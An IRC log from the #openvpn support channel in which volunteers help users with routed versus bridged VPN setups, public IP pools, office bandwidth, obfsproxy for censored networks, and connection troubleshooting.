11:24 <@dazo> Holiday: in the moment you bridge f.ex. tap0 and eth0 into br0 ... in that moment all general network setup, routing tables and iptables rules need to be configured to use br0 ... and they must forget whatever they know about eth0 and tap0
11:25 <@dazo> Holiday: if you need to explicitly firewall on bridge devices, then you need to use ebtables
11:25 <@dazo> Holiday: but I still stand by my last comment ... you have most likely no need for tap+bridging at all .... very, very, very few really need such setups ... and they are complicated and will be challenging to get working
11:26 < Holiday> dazo: I started a TUN config, but wanted to know if instead of the server option this would be correct
11:26 < Holiday> dazo: push "topology subnet"
11:26 < Holiday> ifconfig 128.118.88.126 255.255.255.0
11:26 < Holiday> ifconfig-pool 128.118.88.127 128.118.88.145
11:27 <@dazo> Holiday: those are public IP addresses .... use private IP addresses for the VPN subnet
11:27 <@dazo> Holiday: I've pointed you at this URL before, I think ... and the network setup for OpenVPN is explained here: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#Usingrouting
11:27 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
11:28 < Holiday> dazo: yes I've read that (and I don't want to be a pain in your ass but).. the other guy here insists on using a section of the subnet of the physical server the VPN is running on for the vpn clients
11:29 <@dazo> Holiday: why? ... that makes absolutely no sense in a routed setup ... and that requirement itself causes just more head-aches
11:29 < Holiday> dazo: I think the reason was initially he was looking at IPsec/L2TP and wanted to see IP's out of this range he had set so he could know where the connections were coming from
11:29 < Holiday> I know
11:30 <@dazo> Holiday: Using a routed setup with a separate VPN network segment, you do see where this traffic comes from
11:30 <@dazo> all network connections from VPN clients will have the VPN client's IP address
11:30 < Holiday> dazo: I'm not 100% sure why he wants that
11:31 <@dazo> (and if you combine that info with the openvpn server log ... you'll even deduce from where that particular VPN client connected over the Internet)
11:31 < pekster> You can still use public IPs on a tun setup
11:31 <@dazo> but you need to be far more careful with routing tables .... otherwise the traffic may escape out on a default gateway
11:32 < pekster> Further, you're free to use a GPL bash script I made available that does all the work of accounting for users on disconnect too:
11:32 < pekster> !accounting
11:32 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting
11:32 < pekster> (user, source/VPN IP, duration, bandwidth, etc)
11:32 <@dazo> Holiday: get that guy you're fighting with into this channel ... and we'll talk some sense into him ;-)
11:33 < Holiday> Thank you! Now, while you're both being so helpful.. do you think my bigger issue right now is the public IP's or the TAP lol
11:34 <@dazo> TAP is the biggest issue, no matter how you twist it ... but public IPs on a VPN are just a waste of precious public IP addresses ;-)
11:34 < pekster> tap. No one here said using public IPs was a bad idea (if you've got them to spare it can actually make life easier as no NAT is involved for communicating with DMZ networks that often don't have return-routes for rfc1918)
11:34 * plaisthos did the part of a subpart setup with tun before
11:34 <@plaisthos> using proxy arp
11:34 < Holiday> pekster: that's one thing he's against, NAT and MASQ
11:34 < pekster> Right. So use public IPs
11:35 < Holiday> ok
11:35 < Holiday> so TUN and public
11:35 < pekster> I did that at a shop that had extra /24's lying around, so a /25 of public IPs got routed to our tun-based OpenVPN server for staff
11:36 < Holiday> NOW with the public's being in the same subnet as the VPN server.. is *that* going to give me grief (that's why I was thinking bridged would be easier since they're all in the same subnet)
11:36 <@dazo> Holiday: then just ensure that your openvpn setup uses --topology subnet ... otherwise, each client gets separate /30 subnets (which allocates 4 IP addresses per client)
11:36 < Holiday> Like I've said I've just done simple vpn setups.. not twisted up like this lol
11:36 < Holiday> yes I have:
11:36 < Holiday> push "topology subnet"
11:36 < Holiday> ifconfig 128.118.88.126 255.255.255.0
11:36 < Holiday> ifconfig-pool 128.118.88.127 128.118.88.145
11:36 < pekster> Get the VPN block routed to the VPN server, ideally. plaisthos noted you can use a proxy-arp solution, but that's more messy than it should be
11:37 <@dazo> Holiday: as long as your public IP addresses can be in a separate network segment ... then the rest is routing tables ... and probably some proxy arp
11:37 < Holiday> the .126 being a carry over from the ipsec deal (where the "vpn server host" is to the clients.. unless that should match the interface's real ip)
11:37 < pekster> Also, using a /24 is probably a waste unless you actually need 253 connected users at once
11:37 < pekster> (if you do a proper routed setup, anyway)
11:37 <@dazo> pekster: look carefully at his ifconfig-pool
11:38 < Holiday> should I switch up the .126 to 129 and change to a /28
11:38 < Holiday> er
11:38 < Holiday> yeah 28 right?
11:38 < Holiday> lol
11:38 < pekster> dazo: Sure, but tun setup with subnet for that puts an implicit /24 on the routing table
11:38 < pekster> That's a problem if part of that /24 is actually a physical LAN somewhere
11:38 < Holiday> it is
11:38 <@dazo> ahh! Didn't think about that ... yeah, very true!
11:39 < Holiday> the eth0 on that box is 88.5 and the eth1 is 88.120
11:39 < pekster> To re-use that space, that LAN has to be re-numbered (possibly non-trivial)
11:39 < Holiday> so the clients would have IP's that fall in the range of the actual network the vpn server is on
11:40 <@dazo> Holiday: so eth0 is 88.5 and eth1 is 88.120 ... what are their subnet masks? And what would tun0 be?
11:40 < Holiday> the subnet is 255.255.255.0
11:40 < Holiday> which isn't going to work is it lol
11:40 <@plaisthos> pekster: it's quite easy on IOS, never used proxy-arp on anything else
11:40 <@dazo> Holiday: okay ... you need to create a separate network segment for tun0
11:41 <@dazo> Holiday: and I am not convinced you need both eth0 and eth1 .... that sounds ... redundant
11:41 <@dazo> (esp. as they are both on the same public network)
11:41 < Holiday> no no I was just pointing out what the machine has in it
11:41 <@dazo> okay, good ...
11:41 < Holiday> one physical interface for the vpn and one for what we call "access"
11:42 < Holiday> again sorry for this being such a pain, but trust me any notes/suggestions/etc you guys have given are all written down
11:42 <@dazo> Holiday: so ... your setup ... will it be more like the first ASCII art here: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#Usingrouting .... or more like this one: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#UsingroutingandOpenVPNnotrunningonthedefaultgateway
11:42 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
11:43 < Holiday> #2, where only eth1 is used for VPN (not say in eth1 and out eth0)
11:44 < Holiday> so pretty much eth0 has nothing to do with the setup at all
11:44 <@dazo> okay
11:44 < Holiday> (just happens to be in the box and something I check to see if I can ping when I connect)
11:44 <@dazo> then you need to split your 128.118.88.0/24 subnet up ... you need to allocate a separate segment for the VPN tun0 adapter
11:45 <@dazo> the quickest and easiest is to set up 128.118.88.0/25 (255.255.255.128) and 128.118.88.128/25
11:46 < Holiday> NOW I'
11:46 <@dazo> then you decide which half will be for ethX and which one for tun0 (configured via the --ifconfig option)
11:47 < Holiday> now, if he decides to go private instead of doing the splitting, I recall I think you mentioned before you could get away with that without nat, correct?
11:48 < MFSOT> Hey all, I'm setting up an openVPN client with pfSense server, I'm trying to convince my boss to go to cable 50/5mbs and he says we're fine with dsl, which I'm not sure what we're even getting on there, but it's all over the place. For a small office of 5 piping in, usually only 2-3 at a time how much bandwidth do you think I need?
11:48 < Holiday> (just throwing that out there so I'm all prepped up for when I pass this along)
11:48 <@dazo> Holiday: you can avoid NAT yes, but then only for internal network traffic ... in the moment you want to go to the public Internet with a public IP, then you need to NAT the VPN traffic
11:49 < Holiday> all we care about as far as I know is accessing the boxes on the .88.x network
11:49 < Holiday> so the same ip range as the vpn box is located in
11:50 <@dazo> MFSOT: 50/5 in that setup would be generous ... I have a setup which has peaked at 5-6 people at the same time, with a 10/10 SDSL line ... and nobody noticed anything in regards to performance reduction
11:50 <@dazo> MFSOT: Anyhow, it's the uplink speed you'll notice on the VPN basically
11:51 <@dazo> Holiday: then having a private subnet would be perfectly fine ... then you can just follow the setup of the #1 description ... just replace 192.168.x.x with your public IPs instead
11:51 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has quit [Read error: Connection reset by peer]
11:52 <@dazo> MFSOT probably didn't like that answer ....
11:52 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has joined #openvpn
11:52 < Holiday> Dazo: or their dsl from verizon is that flaky there :)
11:52 <@dazo> heh ... true :)
11:52 <@dazo> MFSOT: did you get my replies?
11:53 < Holiday> dazo: I'll follow that and hopefully get this thing finally churning away without having to pick your brain much more lol. Thanks all of you who jumped in earlier with the good info!
11:53 < Holiday> I'll report back and let you know if I set off the halon system or not lol
11:53 <@dazo> Holiday: you're welcome!
11:53 < MFSOT> dazo: ya, I was shooting for the 50/5 for the 5 up
11:53 < MFSOT> next step down is 30/3
11:53 < MFSOT> testing our up right now on dsl
11:54 < MFSOT> dazo: yes, thank you
11:54 <@dazo> goodie!
11:54 < Holiday> mfsot: just curious but what cable co would that be with?
11:54 < MFSOT> well we started out with a whopping 282 ms ping
11:54 < pekster> SDSL might give you more than 5 up (contrast that to ADSL common on many home nets)
11:54 < MFSOT> a 1.14 down
11:54 < MFSOT> and a .25 up :-/
11:54 < pekster> It's when users save that 15M Excel doc that you get hit ;)
11:54 < MFSOT> Holiday: charter - northeast
11:55 < Holiday> mfsot: okay was just curious (the 50mbps down w/comcast is 10 up, so when I saw east.verizon I wasn't sure who you had to deal with)
11:55 <@dazo> MFSOT: I'd rather put money on a synchronous link than a 50/5 link .... I'd say 5/5 might actually be what you need ... depending on what you have today
11:56 < MFSOT> well the connection will be shared with our physical office
11:56 <@dazo> MFSOT: what do you have now?
11:56 < MFSOT> I'd like more than 5 down
11:57 <@dazo> 10/10 is probably the next logical step then
11:57 < MFSOT> doing some tests on speakeasy and speedtest
11:57 < MFSOT> 6.36/.72
11:57 <@dazo> the site I have with 10/10 SDSL .... that's ~20 people in the office at the same time, plus serving mail and web
11:57 < MFSOT> on both sites :-\
11:57 <@dazo> oh, that .72 is a killer
11:57 < MFSOT> ya this is horrible
11:58 < MFSOT> well I can get 30/3 from charter for the same price
11:58 < MFSOT> dazo: can dsl/verizon up my bandwidth to a custom level?
11:58 <@dazo> don't look yourself blind at the 30 ... asynchronous lines might be shared badly with other clients too
11:59 <@dazo> MFSOT: I dunno ... depends on their equipment and setup .... I'm not in the US, so I have no idea about what they do
11:59 < MFSOT> dazo: I'm more of a sys admin thrust into this role, I have decent networking skills but not advanced, what do you mean by synchronous link?
11:59 * dazo guesses they do whatever to extort as much money out of their customers though
11:59 < pekster> Some providers, depending on equipment, can go 25 Mbps in either direction on DSL. Whether they do or not is up to them and the equipment/line conditions
11:59 < MFSOT> * dazo is right
11:59 < pekster> Maybe more for the 'latest gen' DSL stuff
12:00 <@dazo> MFSOT: asynchronous means like 30/3 ... not the same speed up and down .... while synchronous is like 5/5 ... where both speeds are the same
12:00 < Holiday> Mfsot: yeah, i looked into getting Verizon DSL... it's a joke in my area compared to what say comcast offers (for as "evil" as comcast is)
12:00 < pekster> Actually, 25Mbps is faster than the Comcast here, discounting bursts :\
12:00 <@dazo> synchronous lines are usually hosted on backends aimed at companies with more critical SLAs
12:01 < Holiday> see if they maybe have FiOS?
12:01 <@dazo> async is what most home users get .... and what has the best prices, but also the backends which are most overcommitted
12:01 <@dazo> (they have 1000 customers on a 1Gbit link, selling them 3-10Mbit downlinks)
12:02 < MFSOT> Holiday - unfortunately in Mass each town contracts with a certain provider and that's what we get stuck with, in my case charter
12:02 < Holiday> yeah, PA is the same way
12:03 < Holiday> But verizon is your phone service in that area, correct?
12:03 < MFSOT> yes
12:03 < MFSOT> that's our dsl provider
12:03 < Holiday> see if they have FiOS in your area
12:03 < MFSOT> oh true
12:03 < Holiday> I don't know how far they got with deploying it before they called it quits, but a crapload better than their DSL
12:03 < Holiday> well
12:03 < Holiday> On paper anyhow, I haven't used it personally :)
12:05 < MFSOT> of course everything needs to run fast and great for no money
12:05 < Holiday> yup! (And on that note lunch) I'll report back Dazo and let you guys know how it works out
12:05 < pekster> Google Fiber is doing that ;)
12:10 < MFSOT> pekster, if only I lived in Kansas
12:37 <@krzee> move to kansas and ill pay for your google fiber with my colocation fees
12:46 < Timmy> is openVPN detectable by ISPs or governments? I want to use openVPN services instead of TOR because it works faster
12:47 <+EugeneKay> Yes.
12:47 < pekster> In server/client mode, yes. In static key mode it's literally sending random data down the wire, so just the endpoints could be determined, and that "some encrypted data" was being exchanged
12:48 < pekster> However, static keys lose the advantage of perfect forward secrecy, so there is a trade-off
12:56 < Timmy> well i am using the free service of VPNbook, is this stupid?
13:04 -!- jthunder [~jthunder@184.151.222.94] has joined #openvpn
13:08 -!- Timmy_ [~Timmy@37.254.124.113] has joined #openvpn
13:10 -!- Timmy_ [~Timmy@37.254.124.113] has quit [Client Quit]
13:11 -!- Timmy [~muhammad@unaffiliated/timmyt] has quit [Ping timeout: 272 seconds]
13:12 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has joined #openvpn
13:16 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 272 seconds]
13:20 <@krzee> !obfs
13:20 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation
13:20 <@krzee> !forget obfs
13:20 <@vpnHelper> Error: 2 factoids have that key. Please specify which one to remove, or use * to designate all of them.
13:20 <@krzee> !forget obfs *
13:20 <@vpnHelper> Joo got it.
13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds]
13:20 <@krzee> !learn obfs as if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en to encapsulate your packets in other protocols
13:20 <@vpnHelper> Joo got it.
13:21 <@krzee> !learn obfs as http://community.openvpn.net/openvpn/wiki/TrafficObfuscation
13:21 <@vpnHelper> Joo got it.
13:22 <@krzee> !learn obfs as in client/server mode an admin can know that openvpn is being used. in static-key mode they only know that it is some encrypted data, but not specifically openvpn; however with static-key you lose forward security (!forwardsecurity)
13:22 <@vpnHelper> Joo got it.
13:22 <@krzee> !forwardsecurity
13:22 <@vpnHelper> "forwardsecurity" is (#1) in server/client mode with certs your key renegotiates (changes) every hour (by default), so if someone captures your traffic, and then gets your key, they can only decrypt the traffic within the timeframe since last renegotiation or (#2) in ptp mode (static key) you do not have this, so if someone gets your key they can decrypt ANY past traffic that they captured
13:22 <@krzee> there we goes =]
13:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:32 -!- novaflash is now known as novaflash_away
13:33 -!- [p0rk] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has left #openvpn ["Leaving"]
13:38 -!- novaflash_away is now known as novaflash
13:41 -!- jthunder [~jthunder@184.151.222.94] has quit [Ping timeout: 255 seconds]
13:47 -!- baobeiiii [~baobeiiii@192.73.252.248] has joined #openvpn
13:49 -!- baobeiiii is now known as daniear
13:52 -!- daniear [~baobeiiii@192.73.252.248] has left #openvpn ["Leaving"]
13:55 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit []
14:00 <@dazo> krzee: I added a simple configuration howto for obfsproxy on the !obfs URL
14:00 <@krzee> awesome!
14:01 <@dazo> it's really simple ... so simple it was almost not worth it .... but some people need it :-P
14:01 * dazo still waits for a few of his patches to be applied upstream ... which adds --daemon and --user/--group features to obfsproxy
14:02 < pekster> I'd be fun to see some of that get more adoption bypassing oppressive government filtering and the like
14:02 < pekster> tor doesn't help most users in that situation since it makes no attempt to hide what it is
14:03 < pekster> It'd*
14:03 <@dazo> pekster: obfsproxy has a special TOR mode too ... so it can be used more "integrated" with tor ... but of course, it requires obfsproxy on the tor server side too
14:04 < pekster> Right, but that defeats the purpose of needing tor if you can tunnel out using obfuscation to bypass the oppressive firewall in the first place :)
14:04 < pekster> No point layering slow protocols on top, heh
14:05 <@dazo> pekster: well, tor isn't for obfuscation ... that's to make you anonymous
14:06 < pekster> Sure, and I suppose that could still be required in certain cases. I think the most common case of '$firewalled_user wants to visit news sites, facebook, and twitter' doesn't require tor
14:06 <@dazo> agreed
14:06 < pekster> tor is great, but not for regular use :P
14:06 < pekster> Dial-up is faster...
14:06 < pekster> Depending on content anyway
14:07 <@dazo> I'm mostly thinking of whistleblowers, journalists reporting from certain regimes, and people at risk of prosecution who can benefit most from tor
14:07 < pekster> Yea
14:07 < pekster> obfsproxy to get out of the country plus tor on top to protect their identity
14:07 <@dazo> yeah
14:08 <@dazo> and also to hide the tor traffic .... Secret police: "Hey, you're using TOR - you are doing something we don't like" --> "arrest"
14:08 < pekster> Or, really "whatever" to get out. Be it obfsproxy, openvpn with symmetric crypto, or RFC1149
14:09 <@dazo> hehe ... rfc1149 ... that's a good one .... you know someone actually managed to implement it?
14:09 < pekster> Yes
14:09 * dazo is quite impressed by that :)
14:09 < pekster> There have been 2 fairly well-documented implementations
14:09 < pekster> Although the first group did it better
14:10 <@dazo> hehe ... that's the group where Alan Cox was involved?
14:10 < kisom> We had this idea about implementing IP over gunfire
14:10 < kisom> ...didn't happen
14:10 < pekster> http://www.blug.linux.no/rfc1149/
14:11 <@vpnHelper> Title: Bergen Linux User Group (at www.blug.linux.no)
14:11 <@dazo> hahaha .... well, I guess that could be quite an adventure :-p
14:11 <@dazo> pekster: yeah, that's the one with Alan Cox ... http://www.blug.linux.no/rfc1149/vegard_bilder/tn/04preparation_fri_alan.jpg.html
14:11 <@vpnHelper> Title: Album: 04preparation fri alan (at www.blug.linux.no)
14:11 < pekster> Ah, there we go
14:12 < pekster> Yea, he's hard to recognize unless he's surrounded by ALL CAPS ;)
14:12 <@dazo> hehehehe
14:13 * dazo thinks it's about time to go home :)
14:13 < pekster> I like their download too: pidgeonware-0.15.tar.gz
14:13 < pekster> s/d//
14:15 -!- dazo is now known as dazo_afk
14:15 < pekster> Ah, here's the link to the other one: http://www.bsdly.net/~peter/rfc1149-talk/
14:15 <@vpnHelper> Title: The RFC1149 implementation project (at www.bsdly.net)
14:15 < pekster> Circa 2005
14:16 < pekster> Oh, nope, they just wrapped up the old one. Humph, I swear there was another group that followed suit, but I dunno where that went
14:36 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
14:36 -!- jthunder_ [~jthunder@184.151.222.94] has joined #openvpn
14:37 -!- jthunder_ is now known as jthunder
14:37 -!- Devastator [~devas@186.214.15.240] has joined #openvpn
14:42 < Holiday> I'm back
14:44 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
14:45 -!- loompek [~noname@unaffiliated/loompek] has quit [Quit: ( www.nnscript.com :: NoNameScript 4.22 :: www.esnation.com )]
14:46 < Holiday> okay.. I know you guys are ready to kill me, but he's determined to get tap working lol
14:46 -!- Devastator [~devas@186.214.15.240] has quit [Changing host]
14:46 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
14:47 < Holiday> the VPN is working as a gateway (he re-routed another linux box to use the VPN as its gateway and he's able to get to machines on the same subnet as well as other subnets) so that's all good
14:47 < Holiday> but I can't do crap when I connect from the openvpn client "built into" centos on my machine here.. it connects, I can ping the vpn server IP as well as my vpn client IP, but nothing else (and my internet connection locks up)
14:48 < Holiday> he can't ping my client IP, but I also notice after I disconnect and the ssh session "revives" I see a lot of ECONNREFUSED: connection refused (code=111)
14:50 < pekster> tap is still a horrible solution for you. You do realize that any VPN client will be able to arp-spoof any other system on that LAN, right?
14:51 < pekster> the connection refused is completely expected when one of the sockets goes down and the peer returns ICMP port-unreach errors
14:51 < Holiday> yeah but he also wants IPv6
14:51 < pekster> openvpn does ipv6
14:51 < Holiday> okay
14:51 < pekster> Without tap
14:51 < Holiday> in 2.3.0
14:51 < pekster> !ipv6
14:51 < Holiday> right
14:51 <@vpnHelper> "ipv6" is (#1) http://www.greenie.net/ipv6/openvpn.html for info about the ipv6 patch (adds nice ipv6 options to openvpn) or (#2) use 2.3 or see !snapshots for a release with ipv6 patches in it or (#3) http://ipstats.arvig.net/BraveHeartMEME.jpg
14:53 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has left #openvpn []
14:53 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has joined #openvpn
14:53 < Holiday> well I'm kind of stuck in a hard place as he doesn't want to split the subnet, would like to stick with ethernet bridging, and doesn't want nat/masq (and insists on using that pool of public IP's)
14:53 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has left #openvpn []
14:54 < Holiday> I know it's not optimal though
14:54 < pekster> Sure. It's a bad solution, but you can do it anyway
14:54 < Holiday> I just can't get the last part down or so it seems
14:55 < Holiday> for 0.0.0.0 it's setting the gateway 128.118.88.120 (vpn server) if I force gateway on client.. if I don't the 128.118.88.0 gets a gateway of 0.0.0.0
14:55 < pekster> You're wasting header space, you're needlessly sending broadcasts around, and unless you're doing 802.1X or something, you're exposing the entire server-side LAN to possible client attacks by malware or malicious users including clients setting arbitrary IPs if users/malware is clever enough to do that, or arp-spoofing attacks where a client can redirect traffic of any host
14:55 < pekster> Just be aware of that
14:56 < Holiday> *nod* I understand
14:56 -!- jthunder_ [~jthunder@184.151.222.94] has joined #openvpn
14:56 < Holiday> it's fairly firewalled up on that subnet
14:56 < pekster> Not anymore
14:56 < Holiday> and I understand the vpn clients are an opening
14:56 < pekster> Would you let your VPN users connect to a switch on that LAN?
14:56 < pekster> Because that's exactly what you're doing
14:57 < pekster> If you're trying to redirect the gateway, you should use the directive for that so the VPN-route itself gets set:
14:57 < pekster> !redirect
14:57 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
14:57 <@vpnHelper> http://ircpimps.org/redirect.png
14:58 -!- jthunder [~jthunder@184.151.222.94] has quit [Ping timeout: 260 seconds]
14:58 -!- jthunder_ is now known as jthunder
14:58 < Holiday> I un-commented the push "redirect-gateway def1 bypass-dhcp" but still a no-go when I try to ping anything
14:59 < Holiday> he manually set up the bridge and like I said he can route via it
14:59 < Holiday> and I can ping it from a connected client but can't get to the other physical eth interface or outside
14:59 < pekster> Then it's a firewall issue. Still.
14:59 < pekster> If you can ping the VPN endpoint, the VPN is working just fine
14:59 < Holiday> he shut down the firewall
15:00 < pekster> Then go tcpdump
15:04 -!- jthunder [~jthunder@184.151.222.94] has quit [Remote host closed the connection]
15:04 < Holiday> tcpdump is showing my client on the bridge
15:05 < Holiday> you can see the who-has requests on the bridge etc
15:05 < Holiday> but it also seems to be pulling junk out of its butt lol (looking up hostnames like tmzqetymrd.
15:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:07 < Holiday> I'm going to try with a different client
15:14 -!- bandroid [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
15:21 -!- Holiday [~rjr162@128.118.15.39] has quit [Ping timeout: 245 seconds]
15:26 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn
15:27 < Valcorb> hey pekster: I've been looking into the issue, and it seems that there is no ethernet interface called eth0, so that might be the issue
15:27 < Valcorb> i have lo, tun0, venet0 and venet0:0
15:28 < pekster> That would be an issue if you expect eth0 to exist, yes
15:29 < Valcorb> yup
15:29 < Valcorb> but i forgot how to use snat, do you know how?
15:29 < pekster> I bet the manpage or help output does
15:29 < pekster> I'll even give you one free: 'iptables -j SNAT -h'
15:30 < pekster> How to use it depends greatly on what you intend to do
15:30 < pekster> See also the MASQUERADE target; both are in iptables-extensions(8)
15:31 < Valcorb> i see
15:31 < Valcorb> thanks
15:39 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
15:52 -!- gardar [~gardar@gardar.net] has joined #openvpn
15:56 -!- nickanderson is now known as nickanderson_afk
15:56 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
15:56 -!- mode/#openvpn [+v s7r] by ChanServ
16:07 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
16:16 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
16:24 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
16:41 -!- lickalott is now known as lickalottalottap
16:41 -!- lickalottalottap is now known as lickalottapuss
16:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
16:45 -!- nickanderson_afk is now known as nickanderson
16:48 -!- lickalottapuss is now known as lickalott
16:52 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 272 seconds]
17:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
17:01 -!- raidz is now known as raidz_away
17:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
17:15 -!- zz_AsadH is now known as AsadH
17:15 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 246 seconds]
17:21 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn
17:22 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host]
17:22 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn
17:28 -!- nickanderson is now known as nickanderson_afk
17:32 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!]
17:32 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
17:54 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection]
17:58 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
18:00 -!- NChief_ [tomme@unaffiliated/nchief] has quit [Ping timeout: 264 seconds]
18:00 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
18:54 -!- AsadH is now known as zz_AsadH
18:58 -!- midgaze [~mreid@155.229.21.75] has left #openvpn []
19:02 -!- raidz_away is now known as raidz
19:13 -!- Champi [Champi@rootshell.fr] has quit [Ping timeout: 245 seconds]
19:13 -!- CaBa [caba@unaffiliated/caba] has quit [Ping timeout: 276 seconds]
19:16 -!- Champi [Champi@rootshell.fr] has joined #openvpn
19:16 -!- p3rror [~mezgani@2001:0:53aa:64c:20c2:2140:d606:e632] has quit [Ping timeout: 245 seconds]
19:18 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
19:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 240 seconds]
19:27 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
19:28 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
19:28 -!- raidz is now known as raidz_away
19:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
19:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
20:01 -!- bjh4 [~bjh4@12.104.144.2] has joined #openvpn
20:08 -!- fatmandown [~fa@ool-457e7fe1.dyn.optonline.net] has joined #openvpn
20:10 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
20:10 < fatmandown> For some reason on both win7 and ubuntu 12.04 I'm hanging on "UDPv4 link remote"
20:10 < fatmandown> just won't connect
20:10 < fatmandown> logs here http://pastebin.com/fj624c9u
20:12 < pekster> fatmandown: firewall issue or the service isn't listening on the IP/port you're trying to reach are the likely issues
20:12 < fatmandown> I feel like it isn't a firewall issue b/c ubuntu doesn't even run a firewall by default I don't think
20:12 < fatmandown> and it's the same error on both partitions
20:12 < pekster> ie: the client isn't even able to complete the initial handshake. tcpdump your data to see what's going on
20:13 < pekster> Or start by checking netstat on your server and work out from there (tcpdump the server's listening interface, etc)
20:13 < fatmandown> the firewall on this computer is disabled completely anyway
20:13 < pekster> And the server?
20:13 < fatmandown> no clue, it's on campus
20:14 < fatmandown> i'm new to most of this
20:14 < pekster> Can you route to it? That's a private IP
20:14 < fatmandown> how would i go about finding that out? i'm somewhat incompetent when it comes to networking
20:15 < pekster> Traceroute to it?
20:17 < pekster> If you're outside of whatever org owns that network it won't work anyway since you can't route private IPs across the Internet https://en.wikipedia.org/wiki/Private_network
20:19 < fatmandown> it's a college campus
20:21 < pekster> Then you can likely assume if you're not inside the campus you can't reach a privately-addressed system on the campus. If you don't control the server-side of the network, you need to get further information from those who do
20:22 < pekster> It's like if I told you to see my friend in Apartment 12. You don't know what address I'm talking about, but it's clear to me what "appt 12" means
20:25 < fatmandown> Damn. I wasn't made aware of that by the professor
20:28 -!- bjh4 [~bjh4@12.104.144.2] has quit [Read error: Operation timed out]
21:00 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 256 seconds]
21:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
21:46 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has quit [Ping timeout: 256 seconds]
21:55 -!- chick3n [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn
21:57 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
21:57 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
21:57 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Ping timeout: 255 seconds]
22:03 -!- jY [~jy@photoblog.com] has joined #openvpn
22:08 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer]
22:53 -!- fatmandown [~fa@ool-457e7fe1.dyn.optonline.net] has quit [Read error: Connection reset by peer]
23:15 -!- bandroid is now known as bandroidx
